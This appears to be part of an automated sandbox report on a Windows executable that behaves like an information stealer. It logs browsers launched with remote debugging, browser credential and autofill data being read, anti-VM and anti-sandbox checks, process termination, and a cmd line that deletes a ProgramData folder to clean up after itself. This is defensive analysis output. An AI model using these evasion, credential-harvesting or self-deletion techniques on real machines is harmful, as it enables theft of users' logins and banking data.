                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: YM7YMOHLX.0.dr, J5PP8Q9ZU.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: pjthjsdjgjrtavv.exe Virustotal: Detection: 48%
                  Source: pjthjsdjgjrtavv.exe ReversingLabs: Detection: 57%
                  Source: unknown Process created: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe"
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3
                  Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: dbghelp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: windows.fileexplorer.common.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: ntshrui.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: cscapi.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: linkinfo.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: pcacli.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: pjthjsdjgjrtavv.exe Static PE information: section name: .00cfg

                  Boot Survival

                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: pjthjsdjgjrtavv.exe Binary or memory string: DIR_WATCH.DLL
                  Source: pjthjsdjgjrtavv.exe Binary or memory string: SBIEDLL.DLL
                  Source: pjthjsdjgjrtavv.exe Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: pjthjsdjgjrtavv.exe Binary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Evaded block: after key decision graph_0-14792
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-12846
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3312 Thread sleep count: 82 > 30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: Web Data.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: Web Data.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: Web Data.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: Web Data.15.drBinary or memory string: discord.comVMware20,11696492231f
                  Source: Web Data.15.drBinary or memory string: global block list test formVMware20,11696492231
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                  Source: Web Data.15.drBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: Web Data.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:ou?l
                  Source: Web Data.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: Web Data.15.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: Web Data.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: Web Data.15.drBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: Web Data.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: Web Data.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe API call chain: ExitProcess graph end node graph_0-12444
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe API call chain: ExitProcess graph end node graph_0-13068
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe API call chain: ExitProcess graph end node graph_0-12446
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
